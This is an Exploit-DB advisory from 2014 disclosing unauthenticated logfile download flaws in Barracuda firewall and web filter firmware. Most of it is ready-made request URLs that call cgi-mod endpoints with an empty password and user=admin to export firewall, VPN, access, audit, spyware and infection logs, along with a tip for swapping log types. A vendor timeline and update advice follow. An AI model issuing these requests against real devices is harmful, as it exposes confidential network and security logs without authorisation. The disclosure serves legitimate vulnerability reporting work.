Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: multiple Barracuda products logfile disclosure # Date: 03/26/2014 # Exploit Author: Juergen Grieshofer / 4CKnowLedge # Author Homepage: https://4ck.eu/ # Vendor Homepage: https://barracudalabs.com # Software Link: https://firewall.ptest.cudasvc.com/ # Firmware v6.1.4.008 (2014-02-18 08:06:34) # Modell: X300Vx # BNSEC Nr: BNSEC-4189 -- Download logs without authentication -- $Logfiles https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]} For further logfiles replace the values of [fw, access, http, network, vpn, svc] Timeline: Vendor contacted: 03/26/2014 Vendor generic ticket response: 03/28/2014 Vendor response: 05/16/2014 Vendor approved fix: 08/02/2014 Advice: Update firmware to latest release # Software Link: https://webfilter.ptest.cudasvc.com/ # Firmware v7.0.1.006 (2013-12-12 14:51:33) # Modell: 610VX # BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232 -- Download logs without authentication -- $Weblog https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total= $Auditlog https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total= $Infectionlog https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total= Timeline: Vendor contacted: 04/01/2014 Vendor response: 05/16/2014 Vendor approved fix: 08/02/2014 Advice: Update firmware to latest release